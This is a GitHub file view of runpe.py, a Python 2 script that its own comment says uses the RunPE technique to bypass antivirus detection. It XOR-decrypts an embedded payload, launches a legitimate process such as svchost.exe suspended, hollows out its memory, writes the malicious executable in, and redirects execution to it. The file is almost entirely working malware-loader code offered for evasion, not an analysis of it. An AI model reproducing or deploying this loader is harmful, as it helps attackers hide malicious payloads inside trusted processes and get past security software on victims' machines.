forked from oueldz4/runpe
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathrunpe.py
198 lines (170 loc) · 5.63 KB
/
runpe.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
#!/usr/bin/env python
# This script uses the runpe technique to bypass AV detection
# The payload it contains, is encrypted each time with a random key
# INSTALL pefile and ctypes packages
from itertools import cycle, izip
import sys, pefile
import ctypes
BYTE = ctypes.c_ubyte
WORD = ctypes.c_ushort
DWORD = ctypes.c_ulong
LPSTR = ctypes.c_char_p
HANDLE = ctypes.c_void_p
CREATE_SUSPENDED = 0x0004
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', HANDLE),
('hThread', HANDLE),
('dwProcessId', DWORD),
('dwThreadId', DWORD),
]
class STARTUPINFO(ctypes.Structure):
_fields_ = [
('cb', DWORD),
('lpReserved', LPSTR),
('lpDesktop', LPSTR),
('lpTitle', LPSTR),
('dwX', DWORD),
('dwY', DWORD),
('dwXSize', DWORD),
('dwYSize', DWORD),
('dwXCountChars', DWORD),
('dwYCountChars', DWORD),
('dwFillAttribute', DWORD),
('dwFlags', DWORD),
('wShowWindow', WORD),
('cbReserved2', WORD),
('lpReserved2', DWORD),
('hStdInput', HANDLE),
('hStdOutput', HANDLE),
('hStdError', HANDLE),
]
class FLOATING_SAVE_AREA(ctypes.Structure):
_fields_ = [
("ControlWord", DWORD),
("StatusWord", DWORD),
("TagWord", DWORD),
("ErrorOffset", DWORD),
("ErrorSelector", DWORD),
("DataOffset", DWORD),
("DataSelector", DWORD),
("RegisterArea", BYTE * 80),
("Cr0NpxState", DWORD),
]
class CONTEXT(ctypes.Structure):
_fields_ = [
("ContextFlags", DWORD),
("Dr0", DWORD),
("Dr1", DWORD),
("Dr2", DWORD),
("Dr3", DWORD),
("Dr6", DWORD),
("Dr7", DWORD),
("FloatSave", FLOATING_SAVE_AREA),
("SegGs", DWORD),
("SegFs", DWORD),
("SegEs", DWORD),
("SegDs", DWORD),
("Edi", DWORD),
("Esi", DWORD),
("Ebx", DWORD),
("Edx", DWORD),
("Ecx", DWORD),
("Eax", DWORD),
("Ebp", DWORD),
("Eip", DWORD),
("SegCs", DWORD),
("EFlags", DWORD),
("Esp", DWORD),
("SegSs", DWORD),
("ExtendedRegisters", BYTE * 80),
]
#Encrypted Buffer
#Random Key
#File Path
si = STARTUPINFO()
si.cb = ctypes.sizeof(STARTUPINFO)
pi = PROCESS_INFORMATION()
cx = CONTEXT()
cx.ContextFlags = 0x10007
key = cycle(randomkey)
decryptedbuff= ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(encryptedbuff, key))
# Get payload buffer as PE file
pe = pefile.PE(data=decryptedbuff)
fd_size = len(decryptedbuff)
print "\n[+] Payload size : "+str(fd_size)
calloc = ctypes.cdll.msvcrt.calloc
p = calloc((fd_size+1), ctypes.sizeof(ctypes.c_char))
ctypes.memmove(p, decryptedbuff, fd_size)
print "[+] Pointer : "+str(hex(p))
pefilepath = pefile.PE(filepath)
# Create new process in suspedend mode using a legitim executable (Ex. svchost.exe)
if ctypes.windll.kernel32.CreateProcessA(None, filepath, None, None, False, CREATE_SUSPENDED, None, None, ctypes.byref(si), ctypes.byref(pi)):
print "[+] Process successfuly launched"
print "[+] PID : %d\n" %pi.dwProcessId
else:
print "Failed to create new process"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Unmap the view of sections of the new process created
if ctypes.windll.ntdll.NtUnmapViewOfSection(pi.hProcess, LPSTR(pefilepath.OPTIONAL_HEADER.ImageBase)):
print "[+] Unmap View Of Section Succeed"
else:
print "Failed to unmap the original exe"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Allocate memory to base address of malicious executable in suspended process
if ctypes.windll.kernel32.VirtualAllocEx(pi.hProcess, pe.OPTIONAL_HEADER.ImageBase, pe.OPTIONAL_HEADER.SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):
print "[+] Virtual Alloc Succeed"
else:
print "Failed to allocate virtual memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
# Write in memory malicious file's header
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase), p, ctypes.c_int(pe.OPTIONAL_HEADER.SizeOfHeaders), None):
print "[+] Write Process Memory Succeed"
else:
print "Failed to write to process memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Write sections one by one to memory
for section in pe.sections:
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase+section.VirtualAddress), (p+section.PointerToRawData), ctypes.c_int(section.SizeOfRawData), None):
print "[+] Writing Section "+section.Name+" Succeed"
else:
print "Failed to write to process memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Get CPU context of this process
if ctypes.windll.kernel32.GetThreadContext(pi.hThread, ctypes.byref(cx)):
print "[+] Get Thread Context Succeed"
else:
print "Failed to get thread context"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Push the address of entry point in eax
cx.Eax = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint
# Write ImageBase to Ebx+8
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(cx.Ebx+8), (p+0x11C), 4, None):
print "[+] Write Process Memory Succeed"
else:
print "Failed to write to process memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Replace CPU context
if ctypes.windll.kernel32.SetThreadContext(pi.hThread, ctypes.byref(cx)):
print "[+] Set Thread Context Suceed"
else:
print "Failed to set thread context"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Resume the process so windows continues the execution
if ctypes.windll.kernel32.ResumeThread(pi.hThread):
print "[+] Resume Thread Succeed"
print "\n[*] RunPE Succeed"
else:
print "Failed to resume thread"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)